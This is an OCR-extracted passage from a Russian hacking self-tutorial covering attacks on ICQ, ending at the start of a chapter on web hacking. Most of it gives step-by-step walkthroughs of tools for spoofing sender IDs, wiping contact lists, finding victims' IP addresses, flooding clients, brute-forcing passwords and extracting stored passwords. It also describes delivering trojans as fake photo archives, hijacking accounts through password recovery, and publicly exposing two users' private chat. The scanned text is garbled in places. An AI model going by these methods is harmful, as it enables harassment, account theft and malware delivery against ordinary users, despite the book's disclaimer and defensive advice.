• Спуфинг, то есть фальсификация UIN посылаемых сообщений, что позволяеткомпрометировать своего недруга, рассылая всякую всячину по разным адре-сам. Это особенно легко сделать, если клиент настроен на получение сооб-щений ICQ от других клиентов напрямую, минуя сервер — сервис ICQ предос-тавляет такую возможность. Доказать же, что ты не верблюд, — дело сложное.

• Сетевой хакинг ICQ-клиентов, например, определение IP-адреса своегоICQ-собеседника, что технически несложно, если общение происходит на-прямую. Далее можно воспользоваться разнообразными сетевыми атаками, на-пример, одной из атак DoS, описанных в Главе 9 этой книги. Более того, знаяIP-адрес клиента ICQ, можно совершить полномасштабное вторжение в ком-пьютер доверчивого ламера — определить открытые порты и зафлудить«аську», или прибегнуть к ICQ-бомберу и забросать клиента ворохом бес-смысленных сообщений.

• А какие возможности предоставляет аська для социального мошенничества!К примеру, втеревшись в доверие к ICQ-собеседнику, можно переслать емуфайл якобы самораспаковывающегося архива якобы с фотографией своей со-бачки. Запустив полученный файл для «распаковки» архива, вместо загрузкифотографии пуделя ламер запустит на своем компьютере троянского коня,который будет сообщать хакеру обо всех действиях ламера, а если этот тро-янский конь — активный, то и предоставит хакеру средства для удаленногоуправления компьютером ламера.

• Уязвимости программного обеспечения клиентов и серверов ICQ, возникшиепо причине пренебрежения программистами компании Mirabilis вопросамибезопасности. Разрабатывая программы и протоколы сервиса ICQ, они остави-ли в системе защиты ICQ большие дыры, которыми и воспользовались хакеры.

Рассмотрим все эти возможности хакинга по порядку, но вначале поговоримвот о чем.

100

Page 101: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

Экспериментальная интрасетьс сервисом ICQА теперь о деле. Чтобы не вляпаться по неопытности в какую-либо историю,настоятельно рекомендуем ознакомиться с возможностями сервиса ICQ исредств хакинга ICQ на основе локальной сети с установленным сервером и кли-ентом ICQ. Это создает некоторые неудобства, поскольку многие инструментыхакинга ICQ созданы для работы исключительно с удаленным соединением; бо-лее того, ориентированы на хакинг только отдельных ICQ-серверов (например,описываемая ниже программа LameToy включает средства исключительно дляхакинга сервера www.mirabilis.com). Тем не менее, настоятельно советуем ис-пользовать локальную сеть (а еще лучше ей и ограничиться) наподобие нашейэкспериментальной сети из предыдущей главы, где мы знакомились с хакингомэлектронной почты.

Учитывая скандальный характер излагаемого далее материала,автор вынужден сделать официальное отречение, или, как нынчеговорят, дисклеймер, от всех возможных попыток использованиявсех описываемых далее хакерских штучек. Вся изложенная далееинформация служит только для ознакомления пользователейИнтернета с угрозами, присущими сервису ICQ. Автор категори-чески настаивает на недопустимости использования всех пере-численных средств хакинга по прямому назначению и предупреж-дает об ответственности.

Построим свою локальную сеть следующим образом. На компьютере Sword-2000установим сервер ICQ Groupware Server, на компьютерах Alex-З установимклиент ICQ Groupware Client, который будет исполнять роль хакера с UESf, рав-ным 1001, а на компьютере А1ех-1 установим клиент, который будет исполнятьроль ламера с UIN, равным 1003. Программы сервера и клиента ICQ Groupwareможно найти в Интернете на сайте http://www.icq.com.

Сервис ICQ, реализуемый в локальной сети с помощью программ ICQGroupware, имеет некоторые недостатки, однако позволит нам проиллюстрироватьразличные угрозы и методы хакинга, применяемые современными «кул хацке-рами» наподобие доктора Добрянского из Главы 1. Вообще-то говоря, все опи-сываемые далее методы хакинга ICQ — это полный маразм и отстой, посколькуреальному хакеру сервис ICQ полезен только как средство выуживания полез-ных сведений у доверчивых ламеров или для засылки ламерам троянских конейпод видом новогоднего поздравления. Однако приступая к работе с ICQ никомуи никогда не следует забывать о наличии всех этих штучек вроде ICQ-бомберов,ICQ-флудеров, ICQ-крякеров и тому подобного.

101

Page 102: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Суть спуфинга UIN заключается в рассылке ICQ-сообщений с подмененным UIN -пользуясь знаниями протокола ICQ, хакер создает программу, которая при от-сылке сообщения подставляет фиктивный UIN вместо реального. Спуфинг UINпредставляет собой самое настоящее посягательство на права человека в частиответственности за свои и только за свои поступки. В самом деле, представьтесебе, что кто-то начнет рассылать письма от вашего имени с разного рода инси-нуациями по поводу текущих событий и участия в них отдельных личностей.Отвечать-то придется вам — и кто его знает, чем все обернется.

Чтобы заняться спуфингом, хакеру необходимо специальное программное обес-печение, которое в избытке представлено в Интернете. Наилучшим средством(судя по отзывам в Интернете) считается программа LameToy for ICQ(DBKILLER), которую можно найти на различных, пока еще не зачищенных, ха-керских сайтах (попробуйте сайт http://icq.cracks.ru/attack.shtml). Работа с про-граммой LameToy for ICQ весьма приятна и необременительна, более того, кое-какие функции у программы работают даже в локальной сети. Вкратце опишемвозможности программы LameToy for ICQ.

На Рис. 7.1 представлен диалог, открываемый при запуске программы Lame-Toy for ICQ.

LameToy For Icq [DBKILLER] ЁШШ1ЕЭ| Send [ Slop | | Update; | Menu | | Hide [f Exit

•Losei-

LLMZ. JQ044J

IPott Scarmei-ГйкЛ-ГпйП |

• Selling-[Normal Message M

-UlNSniffer-

1ЩЖ. I Get Local IP 11501

[SendeimiNBIiOOl

IPasswdL l|URL|hHp:/V

Messsage

Puc. 7.1. Диалог LameToy for ICQ (DBKILLER)предоставляет массу возможностей для хакинга ICQ

Для отправки фальсифицированного сообщения следует только ввести в полевнизу диалога LameToy for ICQ (DBKILLER) какой-либо текст и щелкнуть накнопке Send (Отправить). Если надо, в группе элементов управления Setting(Настройка) в поле Loop (Цикл) введите число посланий, а в соседнем справаоткрывающемся списке выберите тип послания. Чтобы скрыть свой UIN, в полеUIN# введите какое-либо число или щелкните на кнопке Ran (Random — Случай-

102

Page 103: Самоучитель хакера подробное иилюстрированное руководство

Хаки нг ICQ

ный). Таким образом, получатель вашего послания будет искать обидчика поадресу, которого, возможно, не существует в природе.

Более интересные штучки, чем рассылка такого рода ICQ-бомб, могут состоять вотправке кому-либо сообщений, в которых UIN отправителя совпадает с UINполучателя. Если получатель внесет отправителя таких посланий в свой кон-тактный лист, то при следующем запуске клиента ICQ старых версий (ICQ99aили ICQ99b) контактный лист будет утерян. Такая атака называется DB-киллер(или еще интереснее — «киляние аськи»), где DB означает Data Base — база дан-ных, поскольку контактный лист хранится в файле базы данных, помещенной вкаталог DB или NewDB. В программе LameToy такую атаку можно выполнить,выбрав тип послания DB killer (Убийца DB) из открывающегося списка в группеэлементов управления Setting (Настройка). Защита от таких атак заключается виспользовании новых версий клиента ICQ, и автор настоятельно советует сде-лать эту операцию незамедлительно.

Программ, которые, подобно LameToy, позволяют фальсифицировать UIN от-правителя, превеликое множество, например, System Messenger — одна из про-грамм группы ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Suckerи другие.

Определение lf~ac)peca и порта ICQ-клиентаУпомянутую выше атаку DoS (как и многие другие) можно выполнить, толькозная ГР-адрес компьютера своей жертвы. Чтобы решить такую задачу, существуетмножество хакерских утилит, например, популярная утилита Advanced ICQ IPSniffer — одна из программ группы ICQ Team (ее можно найти на многих Web-сайтах, например, на http://www.icqinfo.ru/sofl_icqteam.shtml).

На Рис. 7.2 представлен диалог утилиты Advanced ICQ IP Sniffer.

Advanced ICQ IP Sniffer a a a’Your UIN: [207685174 | Password: IJ

UIN to check: |123456783 Clear list Saver

Cheek Timeout. Tiy again.

Ext IP: |

Status: |

| IntIP: |

|TCPFIa9: |

| TCP Pott: |0

| TCP Version: |0

Puc. 7.2. Диалог утилиты-снифера IP-адресов клиентов ICQ

103

Page 104: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Чтобы получить IP-адрес клиента ICQ по его UIN, программа Advanced ICQ IPSniffer подсоединяется к серверу ICQ, используя ваш UIN и пароль. Эти дан-ные следует ввести, соответственно, в поля Your UIN (Ваш UIN) и Password(Пароль) диалога Advanced ICQ IP Sniffer (Усовершенствованный снифер ГРклиента ICQ). Последующий щелчок на кнопке Check (Извлечь) в строке справаот кнопки отображает ход процесса подключения, и если настройки клиента ICQс указанным UTN не запрещают передачу такой информации, в разделе Info(Информация) отобразятся результаты проверки.

Как видим, в разделе Info (Информация) диалога на Рис. 7.2 можно узнать каквнешний, так и внутренний (в локальной сети) IP-адрес клиента ICQ, а такжеTCP-порт, который клиент ICQ использует для приема и получения информа-ции. Эти данные отображаются, соответственно, в полях Ext IP (Внешний ГР), IntIP (Внутренний IP) и TCP Port (Порт TCP). Получив столь исчерпывающие дан-ные, можно приступить к атакам посерьезней рассылки фальсифицированныхICQ-сообщений (чем мы и займемся чуть ниже).

Сервер ICQ, с которым соединяется програм-ма Advanced IP ICQ Sniffer, указан в диалогеICQ server’s address and port (Адрес и портсервера ICQ), отображаемом при щелчке мы-шью на кнопке Server (Сервер) и представлен-ном на Рис. 7.3.

ICQ server’s address and port £3

Address: licq.rnirdbilis.com

Port: [4000 |

| | OK |

| Cancel |

Рис. 7.З. ДиалогICQ server’s address and port(Адрес и порт сервера ICQ)По умолчанию в диалоге ICQ server’s ad-

dress and port (Адрес и порт сервера ICQ)указан адрес сервера Mirabilis и стандартный порт подключения к серверу ICQ -4000. Вы можете указать и другие серверы, пробуя различные комбинации ад-рес/порт для выявления IP-адреса сервера и его порта входящих/исходящих со-общений.

Флудеры ICQ, или, как иногда говорят, ICQ-бомберы, подобны описанным впредыдущей главе мейлбомберам и предназначены для отправки множествасообщений на порт ICQ-клиента с целью прекращения или затруднения рабо-ты клиента ICQ. Толку от таких атак мало, и их используют по большей частиперсонажи наподобие доктора Добрянского, получающие удовольствия отпричинения окружающим мелких гадостей. Однако для полноты изложенияопишем, как работает известный флудер ICQ, входящий в пакет ICQ-MultiWar(http://www.paybackproductions.com/), который так и называется — ICQ Flooder(Рис. 7.4).

104

Page 105: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

ICQ FlooderFile

Victim’s address: 127.0.0.1 | ICQ Port [1027

El Randomly generated UIN

Appatenl source UIN: Q

No. ol Messages: |1 [•••

Message:

Eat this!

ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man

Puc. 7.4. Диалог флудера ICQ

Чтобы воспользоваться флудером ICQ Flooder, выполните такие шаги.

> В поле Victim’s address (Адрес жертвы) введите выявленный IP-адресклиента ICQ.

> В поле ICQ-port (Порт ICQ) введите номер порта TCP.

> Укажите, какой UIN отправителя следует включать в сообщения. Имеется дваварианта:

• Случайная генерация UTN — установите флажок Randomly generated UIN(Генерировать случайные UIN), что приведет к использованию в сообще-ниях случайных UIN отправителей вместо вашего реального UIN.

• Посторонний UIN отправителя — укажите в поле Apparent source UIN(Отображаемый UIN отправителя) фиктивный UIN, который будет ото-бражаться клиентом ICQ получателя.

>• В поле со счетчиком No. of Messages (Число сообщений) укажите число от-сылаемых ICQ-бомб.

> В поле Message (Сообщение) укажите текст сообщения (что-нибудь про-стенькое, но со вкусом).

> Щелкните на кнопке Send! (Отослать) и в отобразившемся диалоге понаблю-дайте за ходом пересылки сообщений.

Опять-таки повторяем, что все эти флудеры ICQ, как и мейлбомберы, — в луч-шем случае орудие возмездия зарвавшемуся «кул хацкеру», но, как справедливо

105

Page 106: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

указано автором одной из статей на сайте http://mht.hut.ru/icq/icq.html, этоотнюдь не инструмент серьезного хакинга (с этой страницы, кстати, можно ска-чать некоторые связанные с ICQ программы, упомянутые в этой главе). Наи-лучшее применение ICQ — это рассылка троянских коней, которые далее будутприносить вам плоды, растущие на чужом огороде, — но отнюдь не затаптыватьэтот самый огород!

сервера ICQЧтобы получить полный контроль над работой ламера с сервисом ICQ, можнопопробовать взломать доступ к серверу ICQ, воспользовавшись методом прямо-го перебора паролей доступа, аналогичного применяемому для взлома почтовыхящиков. С точки зрения криптографии такой метод вполне допустим, если у васимеются неограниченные вычислительные ресурсы, а система защиты не отсле-живает многократные попытки входа с одного адреса.

Для решения задачи брутафорсинга паролей существует множество утилит, напри-мер, ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), диалог которой пред-ставлен на Рис. 7.5.

OICO SubMachineGun vl.4 by uDFile Settings About

[ Bruteforce ]

[… [ 13 Single

[~~] П Single

About

Agent

Force!

||(c) uD . Moscow 2QO1

Puc. 7.5. Утилита ICQ subMachineGunготова брутафорситъ U1N клиента ICQ

106

Page 107: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

На английском языке метод прямого перебора называется «bruteforce» — грубая сила, поэтому на хакерском сленге так и говорят -«брутафорсить пароли», когда речь заходит о взломе паролейдоступа путем тупого перебора всех возможных вариантов. Самже процесс взлома паролей методом грубой силы называется«брутафорсингом ».

Для взлома пароля доступа к серверу ICQ с помощью утилиты ICQ subMachineGunвначале выполните такие шаги по настройки программы.

>• Запустите утилиту ICQ subMachineGun.

> Выберите команду меню Settings * Connections&Cracking (Подключе-ние&Взлом). На экране появится диалог, представленный на Рис. 7.6.

icq server port

[ Cracking ]

13 Stop if successful…ЕЭ Make log of cracked uins0 Reconnect if timeout0 Cut passwds length to 8 digits

set timeout:

relogln ; times

Cancel OK

Puc. 7.6. Настройка утилиты взлома U1N

В поле icq server (Сервер ICQ) укажите адрес сервера ICQ, намеченного длявзлома, или оставьте стандартную установку ICQLmirabilis.server.

В поле port (порт) укажите порт подключения к серверу или оставьте стан-дартное значение 4000.

В группе элементов управления Cracking (Взлом) установите флажки режимавзлома:

• Установка флажка Stop if successful (Остановиться при успехе) оста-навливает дальнейший перебор паролей после успешной регистрации насервере ICQ.

• Установка флажка Make log if cracked uins (Записывать в журнал взло-манные UIN) приводит к записи в журнальный файл всех взломанных па-ролей доступа к серверу ICQ.

107

Page 108: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

• Установка флажка Reconnect if timeout (Восстановить соединение послепростоя) вынуждает утилиту восстанавливать соединение с сервером ICQпосле простоя.

• Установка флажка Cut password length to 8 digits (Ограничить длину пароля8-ю цифрами) ограничивает длину проверяемых паролей 8-ю цифрами.

>• В поле со счетчиком set timeout (установить время простоя) укажите вре-мя ожидания отклика сервера на запрос или оставьте стандартное значе-ние 15 сек.

>• В поле relogin (повторный вход) укажите число попыток входа в сервер ICQили оставьте стандартное число 3.

После настройки утилиты ICQ subMachineGun следует выполнить настройкугенераторов взламываемых UIN и тестируемых паролей. С этой целью выполни-те такие шаги.

> В главном диалоге утилиты ICQ subMachineGun в разделе Bruteforce(Прямой перебор) установите режим генерации взламываемых UIN. Для это-го выберите одну из двух возможностей.

• Установите верхний флажок Single(Одиночный) для проверки единст-венного UIN, который следует ввестив поле слева от флажка.

• Сбросьте нижний флажок Single(Одиночный) для генерирования UIN.

Если выбран режим генерирования UIN,щелчком на верхней кнопке с тремя точ-ками (…) отобразите диалог Making vic-tims list (Генерация списка жертв), пред-ставленный на Рис. 7.7.

В диалоге Making victims list (Генерациясписка жертв) в поля раздела Range (Диа-пазон) последовательно, в порядке сверхувниз, введите нижнюю границу проверяе-мых UIN (умолчание — 100000) и верхнююграницу (умолчание 900900).

I Hint: use Del to remove uins from list

Puc. 7.7. Выбор режима генерациивзламываемых UIN

В поле step (шаг) введите шаг приращения значений UIN (умолчание — 100).

Щелкните на кнопке Generate (Генерировать) и генерируйте UIN; результатотобразится в левой части диалога.

108

Page 109: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

Если необходимо, можете в поле сверху кнопки Generate (Генерировать) ввестикакой-либо UIN, который вы нашли в контактных листах, в Интернете, и т.д.Щелчок на кнопке Add (Добавить) добавит указанный UIN к списку слева.

>• Если у вас имеется текстовый файл со списком UIN, откройте его с помощьюкнопки Open (Открыть) и пополните список проверяемых UIN (в файле каж-дый UIN помещается в отдельную строку).

> Чтобы удалить какой-либо UIN из списка, щелкните на нем в отображаемом

списке и нажмите на клавишу t0*»!. Кнопка Clear (Очистить) позволяет очи-стить список проверяемых UIN (это позволяет начать все заново).

Завершив создание списка UIN, щелкните на кнопке ОК.

Теперь настроим список тестируемых паролей.

> В главном диалоге утилиты ICQ subMachineGun в группе элементов управ-ления Bruteforce (Грубая сила) установите режим генерации тестируемыхпаролей. Для этого выберите одну из двух возможностей.

• Установите верхний флажок Single (Одиночный) для проверки единст-венного пароля, который следует ввести в поле слева от флажка.

• Сбросьте нижний флажок Single (Одиноч-ный) для генерирования паролей.

>• Если выбран режим генерирования паролей, тощелчком мыши на верхней кнопке с тремя точ-ками (…) отобразите диалог Make passlist(Создать список паролей), представленный наРис. 7.8.

В диалоге Make passlist (Создать список паролей)для генерирования списка паролей имеется двевозможности.

> Щелкните на кнопке Open (Открыть) и выбери-те текстовый файл со списком паролей (каждыйпароль в отдельной строке). Это наилучшаявозможность взлома — используя файл со спи-ском наиболее часто используемых паролей,можно попытаться с помощью нескольких со-тен попыток найти пароль неопытного пользо-вателя ICQ.

Use Del to remove passwords from list

Puc. 7.8. Диалоггенерирования паролей

v Введите свой пароль в поле над кнопкой Generator (Генератор) и щелкнитена кнопке Add (Добавить). Последовательно повторяя эту процедуру, попол-ните список паролей.

109

Page 110: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

> Чтобы удалить какой либо пароль из списка, щелкните на нем в отображае-

мом списке и нажмите на клавишу К0*»**]. Кнопка Clear (Очистить) позволяеточистить список проверяемых паролей (чтобы начать все заново).

>• Завершив создание списка паролей, щелкните на кнопке ОК.

Теперь все готово для взлома. Подсоединяемся к Интернету и щелкаем накнопке Force (Ломать). Если вам повезет, то в нижней части диалога ICQsubMachineGun v1.4 отобразится взломанный пароль (Рис. 7.9).

OICQ SubMachineGun vl 4 by uDFile Settings About

[ Bruteforce ]

[Г] 0 Single

[~~] D Single

About

Agent

Puc. 7.9. Пароль взломан — для конфиденциальностион отображен несколько размытым

Чтобы продемонстрировать вам работу утилиты ICQ subMachineGun v1.4, авторпопросту использовал свой UIN, добавив к списку стандартных паролей собст-венный пароль (исходя из соображений конфиденциальности, этот пароль ото-бражен на Рис. 7.9 заретушированным). Как видим, взлом выполнен с помощьютрех попыток на каждый пароль, и каждая попытка заняла 15 сек, потраченныхна ожидание отклика сервера ICQ. Так что теперь вы можете реально оценитьсвои возможности — 45 сек на каждый пароль означают несколько часов непре-рывного брутафорсинга паролей в онлайновом режиме, если список паролейимеет приемлемую длину (не более нескольких сотен паролей). В принципе,учитывая наличие в Интернете большого числа неопытных пользователей с па-ролями, составленными из имен людей, домашних животных, названий автомо-билей, имен популярных артистов и т.д. — шансы у настойчивого хакера неплохие.Было бы за что бороться…

110

Page 111: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

(ССНкрякерыИ все-таки, что там ни говори, брутафорсинг сервера ICQ — вещь достаточнотрудоемкая. Если пользователь сервиса ICQ не поленится ввести пароль доста-точной длины и сложности, то удаленный взлом сервера ICQ простым перебо-ром паролей становится практически невозможным. Так что же, сдаться ипризнать свое бессилие? Не тут-то было! Если вам не удается лобовая атака,почему бы не поискать обходные пути? Например, можно отослать своемуICQ-собеседнику исполняемый файл и попробовать убедить его, что это само-распаковывающийся архивный файл с фотографией его собачки. Клюнувший наэту приманку ламер вместо фотографии собачки обзаведется на своем компью-тере троянским конем, да еще и снабженным средствами удаленного управлениякомпьютером.

Что же может последовать за таким событием? Хакер приобретает возмож-ность исследовать компьютер ламера так, как будто сидит за его консолью иисследует файловую систему хакнутого компьютера проводником Windows.Теперь хакер может применить весь инструментарий для взлома локальногокомпьютера, о котором мы говорили ранее в этой книге. В частности, можноизвлечь пароли доступа к сервису ICQ из локальных файлов, хранящихся впапке с установленной программой клиента ICQ. Для такого рода процедурыимеется множество программ ICQ-крякеров, например, очень интереснаяпрограмма фирмы ElcomSoft под названием Advanced ICQ Password Recovery(http://www.elcomsoft.com).

Работа с этой программой легка и приятна, поскольку делать ничего не надо.На Рис. 7.10 представлено рабочее окно программы Advanced ICQ PasswordRecovery.

31.01.2003 Ш 2:05 — ACQPR1.0 launched, registered version

6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L

Puc. 7.10. Рабочее окно утилиты извлечения паролей ICQ из файлов .dat

Чтобы взломать пароль клиента ICQ, щелкните на значке папки в левой верх-ней части диалога Advanced ICQ Password Recovery (Усовершенствованноевосстановление паролей ICQ) и в стандартном диалоге открытия файла най-дите файл .dat, хранящий пароли клиента ICQ.

111

Page 112: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

ICQ Password successfully found !

ICQ version:99b-2000b

UIN password:

% Copy to Clipboard fij Close

Puc. 7.11. Пароль успешновосстановлен!

У разных клиентов этот файл хранится вразных папках, например, у клиента ICQ2002а эта папка называется 2002а. Папка2002а хранит файл с именем, составлен-ным из номера UIN и расширения .dat,т.е., в данном случае, 207685174.dat(207685174 — это UIN автора). Выбор это-го файла приводит к появлению диалогаICQ Password successfully found! (Па-роль ICQ успешно найден), отображаю-щего восстановленный пароль (Рис. 7.11).

Хотя диалог на Рис. 7.11сообщает, что эта версия программы предназначена дляработы с клиентами ICQ версий 99b — 2000b, она успешно справилась с клиен-том ICQ 2002а (пароль заретуширован из соображений конфиденциальности).

Так что задача хакера, желающего взломать сервис ICQ попавшегося под рукуламера, весьма проста — нужно добраться до его компьютера либо локально, ли-бо удаленно — и применить ICQ-крякер. Возможностей тут множество — локаль-ный доступ к компьютеру, загрузка троянов, отправка почты с активным вло-жением (см. [11]), атака на Web-клиента (см. Главу 8). Все это очень интересно, нотут есть и универсальный метод, называемый социальной инженерией, так чтообсудим и эту тему.

Методы социальной инженерииКак везде и всюду, наиболее эффективным инструментом хакинга сервиса ICQ(и не только) является социальная инженерия, попросту мошенничество. Конеч-но, при наличии достаточно больших вычислительных ресурсов, быстрой линиисвязи и хорошей программы брутафорсинга паролей, можно пойти в лобовуюатаку на сервер ICQ. В этом случае, рано или поздно, но вы можете получитьпароль доступа к сервису ICQ какого-либо ламера, забывшего основной принципкомпьютерной безопасности — использование сложных паролей и их частую за-мену. Однако такую задачу можно решить и иным, более эффективным путем.

Когда вы настраиваете свой клиент ICQ, от вас требуется ввести свой почтовыйадрес. Некоторые пользователи считают эту процедуру пустяковой и указываютвместо реально существующего адреса электронной почты вымышленный ад-рес. Так вот, учтите, что если хакер при обследовании списка ICQ-клиентов най-дет такой вымышленный почтовый адрес — взлом доступа к сервису ICQ вла-дельца этого адреса не вызывает никаких проблем. Дело в том, что именно науказанный при регистрации адрес электронной почты сервер ICQ высылает па-роль, если обладатель UIN воспользуется средствами сервера для восстановле-ния пароля регистрации на сервере. А теперь подумайте — что помешает хакеру

112

Page 113: Самоучитель хакера подробное иилюстрированное руководство

Хакинг ICQ

создать почтовый ящик с таким вымышленным почтовым адресом и запроситьсервер об отправке ему якобы забытого пароля?

Так что вы, наверное, поняли, в чем состоит суть социальной инженерии — вы-ведывание всеми методами у своей жертвы любой информации, помогающейвзломать доступ к информационным ресурсам компьютера. Привычки, пристра-стия, поведение жертвы — все имеет значение, поскольку, к примеру, зная, чтовы любите животных, можно предположить, что при выборе пароля вы исполь-зуете имя своей собачки — а ведь список имен для животных отнюдь не бесконе-чен. Поскольку ICQ — это способ непосредственного, живого общения, человек,обладающий элементарными навыками в психологии, может так «заговорить»своего собеседника, что он согласится принять от него исполняемый файл, раз-болтает все, что знает и не знает, после чего этому ламеру останется только под-считывать убытки.

Другой аспект социального мошенничества — это устройство «заподлянки»,т.е. такой такой ловушки для пользователя ICQ, после которой ему, возможно,придется менять свой образ жизни. Например, можно отослать двум клиентамICQ приглашение на беседу и запустить у себя на компьютере программу ICQ,позволяющую работать одновременно с двумя клиентами ICQ (для такого родаманипуляции имеется даже программа, входящая в пакет ICQ Team(http://www.lcqteam.com)). Далее беседа с одним ICQ-собеседником ведется че-рез первый клиент ICQ, а с другим ICQ-собеседником — через второй клиент ICQ.Содержание беседы немедленно публикуется на общедоступном чате на потехуокружающим — мало ли что там может быть сказано, побывайте на наших чатах.Правда, неплохо придумано? Как говорила героиня популярной комедии,«скромненько, но со вкусом». А что, если эти «собеседники» будут обсуждатьчто-то очень интимное, а в контактных листах указаны их настоящие идентифи-кационные данные? А что, если все это потом… Ну да ладно, умные люди ужевсе поняли, а всем прочим понять простые вещи удается только после некото-рых приключений, и то не всегда.

Так что будучи в Интернете и общаясь в кругу ICQ-собеседников, помните — вынаходитесь в зоне повышенного внимания со стороны всяких разных докторовДобрянских и им подобных персонажей, вполне способных учинить большиенеприятности.

ЗаключениеСервис ICQ играет для хакинга весьма большое значение, однако не все хакеры пра-вильно понимают открывающиеся перед ними возможности. Основное предназна-чение ICQ для серьезного хакера — это сбор полезной информации о своих жертвах,а также распространение троянских коней и прочих хакерских инструментов

113

Page 114: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

по компьютерам ICQ-собеседников. А вот бомбардировка первых попавшихсяклиентов ICQ бессмысленными посланиями и проделывание с ними всяких шту-чек типа атак DoS или разрушения чатов… Все подобные действия не имеютникакой рациональной подоплеки и должны быть морально осуждены.

Для антихакера описанные в этой главе методы хакинга ICQ интересны по двумпричинам. Во-первых, антихакеру следует знать о наличие таких возможностей,как ICQ-флудинг, ICQ-спуфинг, ICQ-крякинг и тому подобного. Назначая паролидля регистрации на серверах ICQ, всегда следует помнить о возможности взломапростого пароля с последующей фальсификацией сообщений или разрушениядоступа к сервису ICQ. А выяснивший ваш IP-адрес хакер запросто может пред-принять сетевую атаку, когда вы будете общаться с ним по прямому доступу,минуя сервер ICQ. О возможностях социального мошенничества по дискредита-ции пользователя ICQ уж и говорить не хочется.

Так что перед тем, как вы войдете в ICQ-сообщество, предпримите меры защиты -отмените все неавторизованные включения вашего UTN в контактные листы ини в коем случае не указывайте в идентификационных данных реальные сведе-ния о себе самом. Далее, общаясь с ICQ-собеседником, всегда запускайте про-грамму-брандмауэр, например, BlacklCE Defender, чтобы избежать возможнойатаки DoS. И самое главное — никогда не принимайте от неизвестных людейфайлы, особенно исполняемые, под каким бы предлогом вам их ни навязывали.В крайнем случае, проверяйте полученные файлы на наличие вирусов и передиспользованием запускайте на тестовых компьютерах. Помните, что столбоваядорога троянских коней в ваш компьютер лежит через клиент ICQ — для хакераэто наилучший способ втереться в доверие к тупому ламеру и заставить его за-пустить на компьютере хакерскую программу.

Во-вторых, антихакеру неплохо бы перенять кое-какие инструменты хакингаICQ, чтобы противостоять атакам из Интернета на своего клиента ICQ. Напри-мер, зная IP-адрес своего ICQ-собеседника, можно контролировать его действияпо полной программе — вплоть до открытого предупреждения о своих возмож-ностях. Это действует весьма отрезвляюще на господ типа доктора Добрянского,не говоря уж о прочих достоинствах такой активной обороны.

Наконец, последний совет. Если вам очень потребуется использовать ICQ для сек-ретных переговоров, можете воспользоваться программой PGP Desktop Security 2.9,которая предоставляет средства шифрования передаваемых ICQ-сообщенийоткрытыми ключами собеседников. Это весьма удобное средство, достаточноэффективно защищающее переговоры при условии использования подписанныхоткрытых PGP-ключей (подробнее об этом можно прочитать в [7]).

114

Page 115: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 8 .

Хакинг Web-caumoftЧто же хакер может извлечь из Web? В начале книги мы уже писали, что Webслужит для хакера одним из основных источников информации, необходимойдля успешного выполнения атаки на компьютерные системы. На Web-страничкаххакер может найти телефоны организации, адреса электронной почты сотрудни-ков организации и адреса Web-сайтов филиалов организации и ее партнеров.Все это весьма ценная вещь, требуемая для выполнения атак на почтовые клиен-ты, для сканирования телефонов организации с целью удаленного взлома досту-па к корпоративной сети, или других задач.

Далее, очень часто хранящаяся на Web-серверах информация содержит многотакого, что не связано напрямую с предоставлением информации посетителям, аоставшееся, например, вследствие недосмотра разработчиков сайта. Очень частов комментариях внутри кода HTML Web-страничек можно найти указания нафамилии разработчиков (а это — логин для попыток входной регистрации), ихтелефоны, адреса электронной почты. Ссылки в коде HTML на ресурсы сайтасодержат сведения о структуре каталогов сервера. Применяемые для работысайта сценарии также не лишены недостатков и подчас позволяют проникать насерверный компьютер за счет элементарных ошибок программирования (на этомоснованы описываемые далее атаки переполнения буфера).

Программное обеспечение, применяемое на Web-сайтах, в частности, Web-серверы,содержит большое число уязвимостей, и выявивший их хакер может с их помо-щью взломать доступ к сайту. Далее хакер превратит сервер HTTP, обслужи-вающий сайт, в ворота для проникновения из Интернета в локальную сеть орга-низации, содержащую лакомые информационные ресурсы. Успеху такой атакивесьма способствует плохая настройка системы защиты Web-сервера, наличиеоткрытых для записи каталогов, слабые пароли доступа и так далее.

Наконец, отчаявшись взломать Web-сайт, хакер может выполнить атаку DoS ипопросту «завалить» работу компьютерной системы сайта, что неоднократнопроисходило даже с такими мощными системами, как сайт Yahoo. Такие атакимы опишем в следующей главе, а в этой главе займемся более созидательными иполезными задачами хакинга Web-серверов, нежели такое достаточно бессмыс-ленное занятие, как отправка (за свой счет) на Web-сервер пакетов, затрудняющихработу серверного компьютера. Вначале сделаем экскурс в вопросы функциониро-вания сайта Web и выявим задачи, которые должен решить хакер для его взлома.

Функционирование Web~caumaФункционирование сети Web можно представить себе как обмен информациеймежду пользователем Web или, как говорят, клиентом Web, и ресурсом Web,

Page 116: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

причем на пути этого обмена находится многоуровневая программно-аппаратная система, которая выполняет следующие функции.

На компьютерах пользователей Web работают программы-клиенты Web, кото-рые обеспечивают пользовательский интерфейс и обмен информацией с серве-ром Web через сеть Интернет. Сервер Web — это служба, исполняемая на сете-вом компьютере и обеспечивающая прием запросов пользователя с последую-щей передачей запроса приложениям Web, которые обрабатывают запрос и пе-редают ответ серверу Web для пересылки запрошенной информации пользова-телю. Приложения Web для обработки запросов чаще всего обращаются к базамданных, используя для этого специальные механизмы подключения к базам дан-ных и поиска в них нужной информации.

В качестве клиентов Web чаще всего используются программы-браузеры Web,например, Internet Explorer (ffi), работающие на основе двух средств — языкаHTML разработки Web-страниц, и протокола HTTP, регламентирующего обменинформацией между сервером и клиентом Web.

